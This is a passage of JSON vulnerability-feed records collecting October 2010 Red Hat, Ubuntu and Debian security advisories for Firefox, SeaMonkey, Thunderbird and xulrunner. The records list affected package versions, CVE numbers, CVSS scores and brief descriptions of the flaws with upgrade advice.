update removes support for 256 bit DHE keys, as such\nkeys are easily broken using modern hardware. (CVE-2010-3173)\n\nA flaw was found in the way NSS matched SSL certificates when the\ncertificates had a Common Name containing a wildcard and a partial IP\naddress. NSS incorrectly accepted connections to IP addresses that fell\nwithin the SSL certificate's wildcard range as valid SSL connections,\npossibly allowing an attacker to conduct a man-in-the-middle attack.\n(CVE-2010-3170)\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 3.6.11. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 3.6.11, which corrects these issues. After installing the\nupdate, Firefox must be restarted for the changes to take effect.\n", "reporter": "RedHat", "published": "2010-10-19T04:00:00", "type": "redhat", "title": "(RHSA-2010:0782) Critical: firefox security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3170", "CVE-2010-3173", "CVE-2010-3175", "CVE-2010-3176", "CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3179", "CVE-2010-3180", "CVE-2010-3182", "CVE-2010-3183"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:08:55", "id": "RHSA-2010:0782", "href": "https://access.redhat.com/errata/RHSA-2010:0782", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-27T21:43:27", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "i386", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-64.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "i386", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-64.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "i386", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-64.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "i386", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "i386", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-64.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "i386", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-64.el4.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "src", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-64.el4.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ia64", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-64.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ia64", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-64.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ia64", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-64.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ia64", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ia64", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-64.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ia64", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-64.el4.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "x86_64", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-64.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "x86_64", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-64.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "x86_64", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-64.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "x86_64", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "x86_64", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-64.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "x86_64", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-64.el4.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ppc", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-64.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ppc", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-64.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ppc", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-64.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ppc", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ppc", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-64.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "ppc", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-64.el4.ppc.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-64.el4.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-64.el4.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-64.el4.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.el4.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-64.el4.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-64.el4.s390.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390x", "packageName": "seamonkey", "packageFilename": "seamonkey-1.0.9-64.el4.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390x", "packageName": "seamonkey-chat", "packageFilename": "seamonkey-chat-1.0.9-64.el4.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390x", "packageName": "seamonkey-devel", "packageFilename": "seamonkey-devel-1.0.9-64.el4.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390x", "packageName": "seamonkey-dom-inspector", "packageFilename": "seamonkey-dom-inspector-1.0.9-64.el4.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390x", "packageName": "seamonkey-js-debugger", "packageFilename": "seamonkey-js-debugger-1.0.9-64.el4.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-64.el4", "arch": "s390x", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.0.9-64.el4.s390x.rpm", "operator": "lt"}], "description": "SeaMonkey is an open source web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2010-3176, CVE-2010-3180)\n\nA flaw was found in the way the Gopher parser in SeaMonkey converted text\ninto HTML. A malformed file name on a Gopher server could, when accessed by\na victim running SeaMonkey, allow arbitrary JavaScript to be executed in\nthe context of the Gopher domain. (CVE-2010-3177)\n\nA flaw was found in the script that launches SeaMonkey. The LD_LIBRARY_PATH\nvariable was appending a \".\" character, which could allow a local attacker\nto execute arbitrary code with the privileges of a different user running\nSeaMonkey, if that user ran SeaMonkey from within an attacker-controlled\ndirectory. (CVE-2010-3182)\n\nIt was found that the SSL DHE (Diffie-Hellman Ephemeral) mode\nimplementation for key exchanges in SeaMonkey accepted DHE keys that were\n256 bits in length. This update removes support for 256 bit DHE keys, as\nsuch keys are easily broken using modern hardware. (CVE-2010-3173)\n\nA flaw was found in the way SeaMonkey matched SSL certificates when the\ncertificates had a Common Name containing a wildcard and a partial IP\naddress. SeaMonkey incorrectly accepted connections to IP addresses that\nfell within the SSL certificate's wildcard range as valid SSL connections,\npossibly allowing an attacker to conduct a man-in-the-middle attack.\n(CVE-2010-3170)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.\n", "reporter": "RedHat", "published": "2010-10-19T04:00:00", "type": "redhat", "title": "(RHSA-2010:0781) Critical: seamonkey security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3170", "CVE-2010-3173", "CVE-2010-3176", "CVE-2010-3177", "CVE-2010-3180", "CVE-2010-3182"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-26T04:26:17", "id": "RHSA-2010:0781", "href": "https://access.redhat.com/errata/RHSA-2010:0781", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:19:41", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4", "arch": "i386", "packageFilename": "thunderbird-1.5.0.12-31.el4.i386.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-31.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4", "arch": "ia64", "packageFilename": "thunderbird-1.5.0.12-31.el4.ia64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4", "arch": "x86_64", "packageFilename": "thunderbird-1.5.0.12-31.el4.x86_64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4", "arch": "ppc", "packageFilename": "thunderbird-1.5.0.12-31.el4.ppc.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4", "arch": "s390", "packageFilename": "thunderbird-1.5.0.12-31.el4.s390.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-31.el4", "arch": "s390x", "packageFilename": "thunderbird-1.5.0.12-31.el4.s390x.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.0.0.24-9.el5", "arch": "i386", "packageFilename": "thunderbird-2.0.0.24-9.el5.i386.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.0.0.24-9.el5", "arch": "src", "packageFilename": "thunderbird-2.0.0.24-9.el5.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.0.0.24-9.el5", "arch": "x86_64", "packageFilename": "thunderbird-2.0.0.24-9.el5.x86_64.rpm", "packageName": "thunderbird", "operator": "lt"}], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code with the privileges of the\nuser running Thunderbird. (CVE-2010-3176, CVE-2010-3180)\n\nNote: JavaScript support is disabled by default in Thunderbird. The above\nissues are not exploitable unless JavaScript is enabled.\n\nA flaw was found in the script that launches Thunderbird. The\nLD_LIBRARY_PATH variable was appending a \".\" character, which could allow a\nlocal attacker to execute arbitrary code with the privileges of a different\nuser running Thunderbird, if that user ran Thunderbird from within an\nattacker-controlled directory. (CVE-2010-3182)\n\nAll Thunderbird users should upgrade to this updated package, which\nresolves these issues. All running instances of Thunderbird must be\nrestarted for the update to take effect.\n", "reporter": "RedHat", "published": "2010-10-19T04:00:00", "type": "redhat", "title": "(RHSA-2010:0780) Moderate: thunderbird security update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3182"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:08:54", "id": "RHSA-2010:0780", "href": "https://access.redhat.com/errata/RHSA-2010:0780", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:33", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3182", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3175", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3183", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3176", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3179", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3178", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3177", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3180"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.9.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "abrowser", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.8.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox-3.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1.9.2.11+build3+nobinonly-0ubuntu0.9.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "1.9.2.11+build3+nobinonly-0ubuntu0.8.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "1.9.2.11+build3+nobinonly-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "1.9.1.14+build4+nobinonly-0ubuntu0.9.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "abrowser", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "1.9.2.11+build3+nobinonly-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.9.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox-3.0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "1.9.2.11+build3+nobinonly-0ubuntu0.9.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "xulrunner-1.9.2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.9.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox-3.5", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "firefox", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "3.6.11+build3+nobinonly-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "abrowser", "operator": "lt"}], "description": "Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov, Josh Soref, Gary Kwong, Martijn Wargers, Siddharth Agarwal and Michal Zalewski discovered various flaws in the browser engine. An attacker could exploit this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-3175, CVE-2010-3176)\n\nAlexander Miller, Sergey Glazunov, and others discovered several flaws in the JavaScript engine. An attacker could exploit this to crash the browser or possibly run arbitrary code as the user invoking the program. (CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nRobert Swiecki discovered that Firefox did not properly validate Gopher URLs. If a user were tricked into opening a crafted file via Gopher, an attacker could possibly run arbitrary JavaScript. (CVE-2010-3177)\n\nEduardo Vela Nava discovered that Firefox could be made to violate the same-origin policy by using modal calls with JavaScript. An attacker could exploit this to steal information from another site. (CVE-2010-3178)\n\nDmitri GribenkoDmitri Gribenko discovered that Firefox did not properly setup the LD_LIBRARY_PATH environment variable. A local attacker could exploit this to execute arbitrary code as the user invoking the program. (CVE-2010-3182)", "edition": 3, "reporter": "Ubuntu", "published": "2010-10-20T00:00:00", "title": "Firefox and Xulrunner vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3177", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2010-10-20T00:00:00", "id": "USN-997-1", "href": "https://usn.ubuntu.com/997-1/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:08:56", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3182", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3175", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3183", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3176", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3179", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3178", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3180"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "3.1.5+build1+nobinonly-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.0.9+build1+nobinonly-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}], "description": "Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov, Josh Soref, Gary Kwong, Martijn Wargers, Siddharth Agarwal and Michal Zalewski discovered various flaws in the browser engine. An attacker could exploit this to crash Thunderbird or possibly run arbitrary code as the user invoking the program. (CVE-2010-3175, CVE-2010-3176)\n\nAlexander Miller, Sergey Glazunov, and others discovered several flaws in the JavaScript engine. If JavaScript were enabled, an attacker could exploit this to crash Thunderbird or possibly run arbitrary code as the user invoking the program. (CVE-2010-3179, CVE-2010-3180, CVE-2010-3183)\n\nEduardo Vela Nava discovered that Thunderbird could be made to violate the same-origin policy by using modal calls with JavaScript. If JavaScript were enabled, an attacker could exploit this to steal information from another site. (CVE-2010-3178)\n\nDmitri GribenkoDmitri Gribenko discovered that Thunderbird did not properly setup the LD_LIBRARY_PATH environment variable. A local attacker could exploit this to execute arbitrary code as the user invoking the program. (CVE-2010-3182)", "edition": 3, "reporter": "Ubuntu", "published": "2010-10-20T00:00:00", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3183"], "modified": "2010-10-20T00:00:00", "id": "USN-998-1", "href": "https://usn.ubuntu.com/998-1/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:02", "references": ["https://usn.ubuntu.com/usn/usn-1011-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-3765"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.0.0.24+build1+nobinonly-0ubuntu0.9.10.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.0.0.24+build1+nobinonly-0ubuntu0.8.04.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "3.0.10+build1+nobinonly-0ubuntu0.10.04.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "10.10", "packageVersion": "3.1.6+build1+nobinonly-0ubuntu0.10.10.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "thunderbird", "operator": "lt"}], "description": "USN-1011-1 fixed a vulnerability in Firefox. This update provides the corresponding update for Thunderbird.\n\nOriginal advisory details:\n\nMorten Krakvik discovered a heap-based buffer overflow in Firefox. If a user were tricked into navigating to a malicious site, an attacker could cause a denial of service or possibly execute arbitrary code as the user invoking the program.", "edition": 3, "reporter": "Ubuntu", "published": "2010-10-28T00:00:00", "title": "Thunderbird vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-3765"], "modified": "2010-10-28T00:00:00", "id": "USN-1011-2", "href": "https://usn.ubuntu.com/1011-2/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2016-09-02T18:27:35", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "x86-64", "packageFilename": "python-xpcom_1.9.0.19-6_amd64.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "arm", "packageFilename": "libmozjs1d_1.9.0.19-6_arm.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "i686", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_i386.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ppc", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_powerpc.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ia64", "packageFilename": "libmozjs1d_1.9.0.19-6_ia64.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mipsel", "packageFilename": "xulrunner-1.9_1.9.0.19-6_mipsel.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mipsel", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_mipsel.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "armel", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_armel.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ppc", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.19-6_powerpc.deb", "packageName": "xulrunner-1.9-gnome-support", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mips", "packageFilename": "spidermonkey-bin_1.9.0.19-6_mips.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "arm", "packageFilename": "python-xpcom_1.9.0.19-6_arm.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ia64", "packageFilename": "spidermonkey-bin_1.9.0.19-6_ia64.deb", "packageName": "spidermonkey-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "i686", "packageFilename": "xulrunner-dev_1.9.0.19-6_i386.deb", "packageName": "xulrunner-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "armel", "packageFilename": "xulrunner-1.9_1.9.0.19-6_armel.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "all", "packageFilename": "libmozillainterfaces-java_1.9.0.19-6_all.deb", "packageName": "libmozillainterfaces-java", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "arm", "packageFilename": "xulrunner-1.9_1.9.0.19-6_arm.deb", "packageName": "xulrunner-1.9", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "mipsel", "packageFilename": "libmozjs1d_1.9.0.19-6_mipsel.deb", "packageName": "libmozjs1d", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "ia64", "packageFilename": "python-xpcom_1.9.0.19-6_ia64.deb", "packageName": "python-xpcom", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.19-6", "arch": "armel", "packageFilename": "libmozjs1d-dbg_1.9.0.19-6_armel.deb", "packageName": "libmozjs1d-dbg", "operator": "lt"}, 